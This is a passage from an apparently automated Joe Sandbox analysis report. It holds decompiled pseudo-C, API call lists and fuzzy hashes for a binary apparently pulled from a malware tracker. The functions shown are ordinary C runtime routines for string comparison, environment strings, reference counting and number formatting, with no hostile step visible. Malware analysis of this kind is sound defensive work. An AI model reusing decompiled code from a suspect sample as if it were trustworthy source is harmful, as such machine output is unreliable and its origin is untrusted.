      												_t118 = MultiByteToWideChar(_a24, 1, _v32, _a20, _t168, _t145);
      												__eflags = _t118;
      												if(_t118 != 0) {
      													_v44 = CompareStringW(_a4, _a8, _v36, _v48, _t168, _t145);
      												}
      												E0041083E(_t168);
      											}
      											goto L78;
      										}
      										_t121 = 0xffffffe0;
      										_t165 = _t121 % _t145;
      										__eflags = _t121 / _t145 - 2;
      										if(_t121 / _t145 < 2) {
      											goto L73;
      										}
      										_t58 = _t145 + 8; // 0x8
      										_t123 = _t145 + _t58;
      										__eflags = _t123 - _t168;
      										if(_t123 > _t168) {
      											_t124 = E0040C70A(_t145, _t165, _t168, _t169, _t123);
      											__eflags = _t124;
      											if(_t124 != 0) {
      												 *_t124 = 0xdddd;
      												_t124 =  &(_t124[4]);
      												__eflags = _t124;
      											}
      											_t168 = _t124;
      											goto L74;
      										}
      										E004136B0(_t123);
      										_t168 = _t171;
      										__eflags = _t168;
      										if(_t168 == 0) {
      											goto L78;
      										}
      										 *_t168 = 0xcccc;
      										_t168 =  &(_t168[4]);
      										goto L74;
      									}
      									_t126 = 0xffffffe0;
      									_t165 = _t126 % _t145;
      									__eflags = _t126 / _t145 - 2;
      									if(_t126 / _t145 < 2) {
      										goto L61;
      									}
      									_t41 = _t145 + 8; // 0x8
      									_t128 = _t145 + _t41;
      									__eflags = _t128 - 0x400;
      									if(_t128 > 0x400) {
      										_t129 = E0040C70A(_t145, _t165, 0x400, MultiByteToWideChar, _t128);
      										__eflags = _t129;
      										if(_t129 == 0) {
      											L60:
      											_v36 = _t129;
      											goto L62;
      										}
      										 *_t129 = 0xdddd;
      										L59:
      										_t129 =  &(_t129[4]);
      										__eflags = _t129;
      										goto L60;
      									}
      									E004136B0(_t128);
      									_t129 = _t171;
      									__eflags = _t129;
      									if(_t129 == 0) {
      										goto L60;
      									}
      									 *_t129 = 0xcccc;
      									goto L59;
      								}
      							}
      						}
      						_t136 = _v32;
      						_t163 = _t165;
      						while(1) {
      							_t163 = _t163 - 1;
      							if( *_t136 == 0) {
      								break;
      							}
      							_t136 = _t136 + 1;
      							if(_t163 != _t168) {
      								continue;
      							}
      							_t163 = _t163 | 0xffffffff;
      							break;
      						}
      						_t165 = _t165 + (_t136 | 0xffffffff) - _t163;
      						_a20 = _t165;
      						goto L20;
      					}
      					L18:
      					_t96 = 0;
      					goto L92;
      				}
      				_t164 = _a12;
      				_t139 = _t145;
      				while(1) {
      					_t164 = _t164 - 1;
      					if( *_t139 == 0) {
      						break;
      					}
      					_t139 = _t139 + 1;
      					if(_t164 != _t168) {
      						continue;
      					}
      					_t164 = _t164 | 0xffffffff;
      					break;
      				}
      				_a12 = _a12 + (_t139 | 0xffffffff) - _t164;
      				goto L11;
      			}

      APIs
      • CompareStringW.KERNEL32 ref: 00410890
      • GetLastError.KERNEL32(?,?,?,00410C10,01D31728,?,?,?,?,?,00418BD0,?,01D31728,00418BD0,00418BD0,00418BD0), ref: 004108A6
      • GetCPInfo.KERNEL32(01D31728,?,00000000,7FFFFFFF,00000000,?,?,?,00410C10,01D31728,?,?), ref: 00410973
      • MultiByteToWideChar.KERNEL32(01D31728,00000009,00418BD0,000000FF,00000000,00000000,?,?,?,00410C10,01D31728,?,?), ref: 004109F9
      • MultiByteToWideChar.KERNEL32(01D31728,00000001,?,000000FF,00000000,00000000), ref: 00410A6E
      • MultiByteToWideChar.KERNEL32(01D31728,00000009,01D31728,?,00000000,00000000), ref: 00410A87
        • Part of subcall function 0040C70A: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001), ref: 0040C782
      • MultiByteToWideChar.KERNEL32(01D31728,00000001,01D31728,?,00000000,00000000), ref: 00410AE6
      • CompareStringW.KERNEL32 ref: 00410AFA
        • Part of subcall function 004134B0: GetLocaleInfoA.KERNEL32(7FFFFFFF,00001004,00000000,00000006,00000000,7FFFFFFF,00000000,?,?,?,00410C10,01D31728,?,?), ref: 004134D2
      • CompareStringA.KERNEL32 ref: 00410BB4
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93
        • Part of subcall function 004134F7: GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,0041311E,00000001,?,00000000,?,?,?), ref: 00413540
        • Part of subcall function 004134F7: GetCPInfo.KERNEL32(?,00000001,?,0041311E,00000001,?), ref: 00413559
        • Part of subcall function 004134F7: _strlen.LIBCMT ref: 00413577
        • Part of subcall function 004134F7: MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,00000000,00000000,?,0041311E,00000001,?,00000000,?,?,?,?,00000000), ref: 004135B7
        • Part of subcall function 004134F7: MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,?,00000000,?,?,?,?,?,?,?,0041311E,00000001,?), ref: 00413606
        • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413621
        • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413647
        • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 0041366C
        • Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
        • Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
        • Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
        • Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
        • Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ByteCharMultiWide$Info$CompareString$ErrorExceptionFilterHeapLastProcessUnhandled$AllocCurrentDebuggerFreeLocalePresentTerminate_strlen
      • String ID:
      • API String ID: 3425806904-0
      • Opcode ID: 2d56152bed8c4dde0717e7715c16880031ff5ad7f916456f779a67c982e138e1
      • Instruction ID: 7711d9c21cebea5d5858b18d19238fb1847bf70f07deecd0d53e6b420bb80e20
      • Opcode Fuzzy Hash: 2d56152bed8c4dde0717e7715c16880031ff5ad7f916456f779a67c982e138e1
      • Instruction Fuzzy Hash: DEB1E571A042099FEF219FA4CC51BEF7BB5EF44354F24412BF811A6291D7B898D1CB98
      C-Code - Quality: 98%
      			E0040F493() {
      				int _v4;
      				int _v8;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				intOrPtr _t7;
      				CHAR* _t8;
      				WCHAR* _t17;
      				int _t20;
      				char* _t24;
      				long _t29;
      				int _t30;
      				void* _t35;
      				WCHAR* _t37;
      				CHAR* _t38;
      				intOrPtr _t39;
      				int _t41;
      
      				_t7 =  *0x436640; // 0x1
      				_t30 = 0;
      				_t37 = 0;
      				_t39 = 2;
      				if(_t7 != 0) {
      					L6:
      					__eflags = _t7 - 1;
      					if(_t7 != 1) {
      						__eflags = _t7 - _t39;
      						if(_t7 == _t39) {
      							L21:
      							_t8 = GetEnvironmentStrings();
      							_t38 = _t8;
      							__eflags = _t38 - _t30;
      							if(_t38 == _t30) {
      								L9:
      								return 0;
      							}
      							__eflags =  *_t38 - _t30;
      							if( *_t38 == _t30) {
      								L25:
      								_t40 = _t8 - _t38 + 1;
      								_t35 = E00411099(_t8 - _t38 + 1);
      								__eflags = _t35 - _t30;
      								if(_t35 != _t30) {
      									E004125F0(_t30, _t35, _t38, _t35, _t38, _t40);
      									FreeEnvironmentStringsA(_t38);
      									return _t35;
      								}
      								FreeEnvironmentStringsA(_t38);
      								goto L9;
      							} else {
      								goto L23;
      							}
      							do {
      								do {
      									L23:
      									_t8 =  &(_t8[1]);
      									__eflags =  *_t8 - _t30;
      								} while ( *_t8 != _t30);
      								_t8 =  &(_t8[1]);
      								__eflags =  *_t8 - _t30;
      							} while ( *_t8 != _t30);
      							goto L25;
      						}
      						__eflags = _t7 - _t30;
      						if(_t7 != _t30) {
      							goto L9;
      						}
      						goto L21;
      					}
      					L7:
      					if(_t37 != _t30) {
      						L10:
      						__eflags =  *_t37 - _t30;
      						_t17 = _t37;
      						if( *_t37 == _t30) {
      							L13:
      							_t20 = (_t17 - _t37 >> 1) + 1;
      							_v4 = _t20;
      							_t41 = WideCharToMultiByte(_t30, _t30, _t37, _t20, _t30, _t30, _t30, _t30);
      							__eflags = _t41 - _t30;
      							if(_t41 != _t30) {
      								_t24 = E00411099(_t41);
      								__eflags = _t24 - _t30;
      								_v8 = _t24;
      								if(_t24 != _t30) {
      									__eflags = WideCharToMultiByte(_t30, _t30, _t37, _v4, _t24, _t41, _t30, _t30);
      									if(__eflags == 0) {
      										_push(_v8);
      										E00410D1A(_t30, WideCharToMultiByte, _t37, __eflags);
      										_v8 = _t30;
      									}
      									_t30 = _v8;
      								}
      							}
      							FreeEnvironmentStringsW(_t37);
      							return _t30;
      						} else {
      							goto L11;
      						}
      						do {
      							do {
      								L11:
      								_t17 = _t17 + _t39;
      								__eflags =  *_t17 - _t30;
      							} while ( *_t17 != _t30);
      							_t17 = _t17 + _t39;
      							__eflags =  *_t17 - _t30;
      						} while ( *_t17 != _t30);
      						goto L13;
      					}
      					_t37 = GetEnvironmentStringsW();
      					if(_t37 != _t30) {
      						goto L10;
      					}
      					goto L9;
      				}
      				_t37 = GetEnvironmentStringsW();
      				if(_t37 == 0) {
      					_t29 = GetLastError();
      					__eflags = _t29 - 0x78;
      					if(_t29 != 0x78) {
      						_t7 =  *0x436640; // 0x1
      					} else {
      						_t7 = _t39;
      						 *0x436640 = _t7;
      					}
      					goto L6;
      				} else {
      					 *0x436640 = 1;
      					goto L7;
      				}
      			}

      APIs
      • GetEnvironmentStringsW.KERNEL32(?,?,?,00000001,?,?,0040C94F), ref: 0040F4AF
      • GetLastError.KERNEL32(?,00000001,?,?,0040C94F), ref: 0040F4C3
      • GetEnvironmentStringsW.KERNEL32(?,?,?,00000001,?,?,0040C94F), ref: 0040F4E9
      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000001,?,?,0040C94F), ref: 0040F524
      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000001,?,?,0040C94F), ref: 0040F546
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93
      • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000001,?,?,0040C94F), ref: 0040F55F
      • GetEnvironmentStrings.KERNEL32(?,?,?,00000001,?,?,0040C94F), ref: 0040F571
        • Part of subcall function 00411099: Sleep.KERNEL32(00000000,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001,?,?,0040D22C,00000004,00418C58,0000000C,004110EC), ref: 004110B6
      • FreeEnvironmentStringsA.KERNEL32(00000000,?,00000001,?,?,0040C94F), ref: 0040F5A2
      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040F5B9
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide$HeapSleep
      • String ID:
      • API String ID: 38382023-0
      • Opcode ID: 03fe7a4f2fd2452b004d2493e1ba392a754789a28793f81e4d1cb6452a711f60
      • Instruction ID: 6bf94f53e6792b39615ea347a74f884125bffed823015082882c4e2888071e4e
      • Opcode Fuzzy Hash: 03fe7a4f2fd2452b004d2493e1ba392a754789a28793f81e4d1cb6452a711f60
      • Instruction Fuzzy Hash: 803116B25042257FC7303F745C8483B7AECEB58354725093BFA45E3B82E6395C8D86A9
      C-Code - Quality: 94%
      			E004134F7(void* __edx, int _a4, int _a8, char* _a12, intOrPtr* _a16, char* _a20, int _a24) {
      				signed int _v8;
      				struct _cpinfo _v28;
      				int _v32;
      				int _v36;
      				int _v40;
      				char* _v44;
      				int _v48;
      				int* _v52;
      				char* _v56;
      				void* _v68;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t54;
      				intOrPtr* _t57;
      				int _t59;
      				int _t60;
      				int _t62;
      				char* _t68;
      				int _t69;
      				int _t74;
      				char* _t79;
      				void* _t91;
      				int _t93;
      				signed int _t96;
      				int _t97;
      				int _t107;
      
      				_t91 = __edx;
      				_t54 =  *0x42c4a0; // 0xe190ffa3
      				_v8 = _t54 ^ _t96;
      				_v44 = _a12;
      				_t57 = _a16;
      				_v52 = _t57;
      				_v40 =  *_t57;
      				_t59 = _a4;
      				_v56 = _a20;
      				_v36 = 0;
      				_v48 = 0;
      				if(_t59 == _a8) {
      					L33:
      					_t60 = _v36;
      					L34:
      					return E0040FE9A(_t60, _t79, _v8 ^ _t96, _t91, 0, _t93);
      				}
      				_t62 = GetCPInfo(_t59,  &_v28);
      				_t79 = MultiByteToWideChar;
      				if(_t62 == 0 || _v28 != 1 || GetCPInfo(_a8,  &_v28) == 0 || _v28 != 1) {
      					_t93 = MultiByteToWideChar(_a4, 1, _v44, _v40, 0, 0);
      					__eflags = _t93;
      					if(_t93 != 0) {
      						goto L8;
      					}
      					goto L14;
      				} else {
      					_t93 = _v40;
      					_v48 = 1;
      					if(_t93 == 0xffffffff) {
      						_t93 = E0040CCD0(_v44) + 1;
      					}
      					_t107 = _t93;
      					L8:
      					if(_t107 <= 0 || _t93 > 0x7ffffff0) {
      						_v32 = 0;
      						goto L20;
      					} else {
      						_t22 = _t93 + 8; // 0x413126
      						_t73 = _t93 + _t22;
      						if(_t93 + _t22 > 0x400) {
      							_t74 = E0040C70A(_t79, _t91, 0, _t93, _t73);
      							__eflags = _t74;
      							if(_t74 == 0) {
      								L18:
      								_v32 = _t74;
      								L20:
      								if(_v32 == 0) {
      									L14:
      									_t60 = 0;
      									goto L34;
      								}
      								E0040FE20(0, _v32, 0, _t93 + _t93);
      								if(MultiByteToWideChar(_a4, 1, _v44, _v40, _v32, _t93) == 0) {
      									L32:
      									E0041083E(_v32);
      									goto L33;
      								}
      								_t79 = _v56;
      								if(_t79 == 0) {
      									__eflags = _v48;
      									_t79 = WideCharToMultiByte;
      									if(_v48 != 0) {
      										L27:
      										_t68 = E004110D9(1, _t93);
      										__eflags = _t68;
      										_v36 = _t68;
      										if(_t68 != 0) {
      											_t69 = WideCharToMultiByte(_a8, 0, _v32, _t93, _t68, _t93, 0, 0);
      											__eflags = _t69;
      											if(__eflags != 0) {
      												__eflags = _v40 - 0xffffffff;
      												if(_v40 != 0xffffffff) {
      													 *_v52 = _t69;
      												}
      											} else {
      												_push(_v36);
      												E00410D1A(_t79, 0, _t93, __eflags);
      												_v36 = 0;
      											}
      										}
      										goto L32;
      									}
      									_t93 = WideCharToMultiByte(_a8, 0, _v32, _t93, 0, 0, 0, 0);
      									__eflags = _t93;
      									if(_t93 == 0) {
      										goto L32;
      									}
      									goto L27;
      								}
      								if(WideCharToMultiByte(_a8, 0, _v32, _t93, _t79, _a24, 0, 0) != 0) {
      									_v36 = _t79;
      								}
      								goto L32;
      							}
      							 *_t74 = 0xdddd;
      							L17:
      							_t74 = _t74 + 8;
      							goto L18;
      						}
      						E004136B0(_t73);
      						_t74 = _t97;
      						if(_t74 == 0) {
      							goto L18;
      						}
      						 *_t74 = 0xcccc;
      						goto L17;
      					}
      				}
      			}

      APIs
      • GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,0041311E,00000001,?,00000000,?,?,?), ref: 00413540
      • GetCPInfo.KERNEL32(?,00000001,?,0041311E,00000001,?), ref: 00413559
      • _strlen.LIBCMT ref: 00413577
      • MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,00000000,00000000,?,0041311E,00000001,?,00000000,?,?,?,?,00000000), ref: 004135B7
        • Part of subcall function 0040C70A: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001), ref: 0040C782
      • MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,?,00000000,?,?,?,?,?,?,?,0041311E,00000001,?), ref: 00413606
      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413621
      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413647
        • Part of subcall function 004110D9: Sleep.KERNEL32(00000000,0040FA78,00000001,00000214), ref: 004110FE
      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 0041366C
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93
        • Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
        • Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
        • Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
        • Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
        • Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ByteCharMultiWide$ExceptionFilterHeapInfoProcessUnhandled$AllocCurrentDebuggerErrorFreeLastPresentSleepTerminate_strlen
      • String ID:
      • API String ID: 39159627-0
      • Opcode ID: 9172eab0718f799f2318d6833266146a2621448cc8ac9bd4536fe52e53d60e9d
      • Instruction ID: 1ecd90587a3fbcf07871c9e8a2363682220bc223f27ba50f4d36a1a1f5e24ce7
      • Opcode Fuzzy Hash: 9172eab0718f799f2318d6833266146a2621448cc8ac9bd4536fe52e53d60e9d
      • Instruction Fuzzy Hash: 4C516C31900219BECF219F96CC449EFBFBAEF88755F10412AE514A2250D7399A81CB68
      C-Code - Quality: 100%
      			E004106FE() {
      				LONG* _t13;
      				LONG* _t14;
      				LONG* _t15;
      				LONG* _t16;
      				LONG* _t17;
      				LONG* _t18;
      				LONG** _t29;
      				LONG* _t34;
      				void* _t36;
      				void* _t38;
      
      				_t34 =  *(_t38 + 8);
      				if(_t34 == 0) {
      					L18:
      					return _t34;
      				}
      				InterlockedDecrement(_t34);
      				_t2 =  &(_t34[0x2c]); // 0xffffffd4
      				_t13 =  *_t2;
      				if(_t13 != 0) {
      					InterlockedDecrement(_t13);
      				}
      				_t3 =  &(_t34[0x2e]); // 0xfffffffe
      				_t14 =  *_t3;
      				if(_t14 != 0) {
      					InterlockedDecrement(_t14);
      				}
      				_t4 =  &(_t34[0x2d]); // 0x0
      				_t15 =  *_t4;
      				if(_t15 != 0) {
      					InterlockedDecrement(_t15);
      				}
      				_t5 =  &(_t34[0x30]); // 0x40d436
      				_t16 =  *_t5;
      				if(_t16 != 0) {
      					InterlockedDecrement(_t16);
      				}
      				_t6 =  &(_t34[0x14]); // 0x418c20
      				_t29 = _t6;
      				_t36 = 6;
      				do {
      					if( *((intOrPtr*)(_t29 - 8)) != 0x42c9d0) {
      						_t17 =  *_t29;
      						if(_t17 != 0) {
      							InterlockedDecrement(_t17);
      						}
      					}
      					if( *((intOrPtr*)(_t29 - 4)) != 0) {
      						_t9 =  &(_t29[1]); // 0x40c9f9
      						_t18 =  *_t9;
      						if(_t18 != 0) {
      							InterlockedDecrement(_t18);
      						}
      					}
      					_t29 =  &(_t29[4]);
      					_t36 = _t36 - 1;
      				} while (_t36 != 0);
      				_t10 =  &(_t34[0x35]); // 0x0
      				InterlockedDecrement( *_t10 + 0xb4);
      				goto L18;
      			}

      APIs
      • InterlockedDecrement.KERNEL32(00418BD0), ref: 00410711
      • InterlockedDecrement.KERNEL32(FFFFFFD4), ref: 0041071E
      • InterlockedDecrement.KERNEL32(FFFFFFFE), ref: 0041072B
      • InterlockedDecrement.KERNEL32(00000000), ref: 00410738
      • InterlockedDecrement.KERNEL32(Function_0000D436), ref: 00410745
      • InterlockedDecrement.KERNEL32(Function_0000D436), ref: 0041075D
      • InterlockedDecrement.KERNEL32(0040C9F9), ref: 0041076D
      • InterlockedDecrement.KERNEL32(-000000B4), ref: 00410781
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: DecrementInterlocked
      • String ID:
      • API String ID: 3448037634-0
      • Opcode ID: c309e9319e6b4badbc4ebdbb08fca9c69156c54253e9810b2ea060dee84c474f
      • Instruction ID: 028784eb5457a0257e02225f07bb79784b4a274754f8e19908869395e5048ee4
      • Opcode Fuzzy Hash: c309e9319e6b4badbc4ebdbb08fca9c69156c54253e9810b2ea060dee84c474f
      • Instruction Fuzzy Hash: 6C01097170070497DB20AA69DC84BABB3DDAF40740F09481AE569D7290C7B8F8C0CE65
      C-Code - Quality: 100%
      			E00410678() {
      				LONG* _t12;
      				LONG* _t13;
      				LONG* _t14;
      				LONG* _t15;
      				LONG* _t16;
      				LONG* _t17;
      				long* _t27;
      				LONG* _t29;
      				void* _t30;
      				void* _t31;
      
      				_t29 =  *(_t31 + 0x10);
      				InterlockedIncrement(_t29);
      				_t12 = _t29[0x2c];
      				if(_t12 != 0) {
      					InterlockedIncrement(_t12);
      				}
      				_t13 = _t29[0x2e];
      				if(_t13 != 0) {
      					InterlockedIncrement(_t13);
      				}
      				_t14 = _t29[0x2d];
      				if(_t14 != 0) {
      					InterlockedIncrement(_t14);
      				}
      				_t15 = _t29[0x30];
      				if(_t15 != 0) {
      					InterlockedIncrement(_t15);
      				}
      				_t27 =  &(_t29[0x14]);
      				_t30 = 6;
      				do {
      					if( *((intOrPtr*)(_t27 - 8)) != 0x42c9d0) {
      						_t16 =  *_t27;
      						if(_t16 != 0) {
      							InterlockedIncrement(_t16);
      						}
      					}
      					if( *((intOrPtr*)(_t27 - 4)) != 0) {
      						_t17 = _t27[1];
      						if(_t17 != 0) {
      							InterlockedIncrement(_t17);
      						}
      					}
      					_t27 =  &(_t27[4]);
      					_t30 = _t30 - 1;
      				} while (_t30 != 0);
      				return InterlockedIncrement(_t29[0x35] + 0xb4);
      			}

      APIs
      • InterlockedIncrement.KERNEL32(?), ref: 00410687
      • InterlockedIncrement.KERNEL32(?), ref: 00410694
      • InterlockedIncrement.KERNEL32(?), ref: 004106A1
      • InterlockedIncrement.KERNEL32(?), ref: 004106AE
      • InterlockedIncrement.KERNEL32(?), ref: 004106BB
      • InterlockedIncrement.KERNEL32(?), ref: 004106D3
      • InterlockedIncrement.KERNEL32(00000000), ref: 004106E3
      • InterlockedIncrement.KERNEL32(?), ref: 004106F7
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: IncrementInterlocked
      • String ID:
      • API String ID: 3508698243-0
      • Opcode ID: 584b5d64936ea70bd28ca7ffe56d6955d16a170757f0f3b430a4e9ab05ba8e87
      • Instruction ID: 830e34ad8cf14a22a2fda40cda4a16f8d124ab60a671defd66db59c947213d31
      • Opcode Fuzzy Hash: 584b5d64936ea70bd28ca7ffe56d6955d16a170757f0f3b430a4e9ab05ba8e87
      • Instruction Fuzzy Hash: 0B010C7170170897DB20EA7ADD88FABB3DCAF80354F09485AF544D7250DBB8E890CA69
      C-Code - Quality: 35%
      			E0040DA76(void* __ebx, void* __edx, signed int* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
      				short _v8;
      				signed int _v12;
      				signed int _v16;
      				signed int _v20;
      				signed int _v24;
      				char _v28;
      				intOrPtr _v32;
      				char _v40;
      				void* __edi;
      				intOrPtr* _t93;
      				signed int _t100;
      				signed int _t101;
      				signed int _t108;
      				signed int _t109;
      				signed int _t110;
      				signed int _t116;
      				signed int _t118;
      				signed int _t121;
      				signed int _t122;
      				intOrPtr _t123;
      				void* _t131;
      				char* _t132;
      				signed int _t137;
      				signed int _t142;
      				signed int _t148;
      				void* _t149;
      				signed int _t151;
      				void* _t154;
      				char* _t158;
      				signed int _t172;
      				char _t176;
      				char _t177;
      				unsigned int _t180;
      				signed int _t185;
      				void* _t191;
      				signed int _t194;
      				signed int _t195;
      				signed int* _t203;
      				signed int _t204;
      				signed int _t205;
      				intOrPtr _t206;
      				char* _t207;
      				char* _t208;
      				signed int _t209;
      				signed int _t210;
      				char* _t211;
      				signed int _t212;
      
      				_t191 = __edx;
      				_t149 = __ebx;
      				_v24 = 0x3ff;
      				_v8 = 0x30;
      				E0040CB46( &_v40, 0, _a24);
      				if(_a16 < 0) {
      					_a16 = 0;
      				}
      				_t205 = _a8;
      				_t220 = _t205;
      				if(_t205 != 0) {
      					__eflags = _a12;
      					if(__eflags <= 0) {
      						goto L3;
      					}
      					__eflags = _a12 - _a16 + 0xb;
      					 *_t205 = 0;
      					if(__eflags > 0) {
      						_t203 = _a4;
      						_v16 =  *_t203;
      						_t100 = _t203[1];
      						_push(_t149);
      						_t162 = _t100 >> 0x00000014 & 0x000007ff;
      						__eflags = (_t100 >> 0x00000014 & 0x000007ff) - 0x7ff;
      						if((_t100 >> 0x00000014 & 0x000007ff) != 0x7ff) {
      							L22:
      							_t101 = _t100 & 0x80000000;
      							__eflags = _t101;
      							if(_t101 != 0) {
      								 *_t205 = 0x2d;
      								_t205 = _t205 + 1;
      								__eflags = _t205;
      							}
      							_t151 = _a20;
      							 *_t205 = 0x30;
      							_t207 = _t205 + 1;
      							__eflags = _t151;
      							 *_t207 = ((_t101 & 0xffffff00 | _t151 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
      							_t208 = _t207 + 1;
      							asm("sbb ebx, ebx");
      							_t154 = ( ~_t151 & 0xffffffe0) + 0x27;
      							__eflags = _t203[1] & 0x7ff00000;
      							if((_t203[1] & 0x7ff00000) != 0) {
      								 *_t208 = 0x31;
      								_t209 = _t208 + 1;
      								__eflags = _t209;
      							} else {
      								 *_t208 = 0x30;
      								_t209 = _t208 + 1;
      								__eflags =  *_t203 | _t203[1] & 0x000fffff;
      								if(( *_t203 | _t203[1] & 0x000fffff) != 0) {
      									_v24 = 0x3fe;
      								} else {
      									_v24 = 0;
      								}
      							}
      							_t108 = _t209;
      							_t210 = _t209 + 1;
      							__eflags = _a16;
      							_a8 = _t108;
      							if(_a16 != 0) {
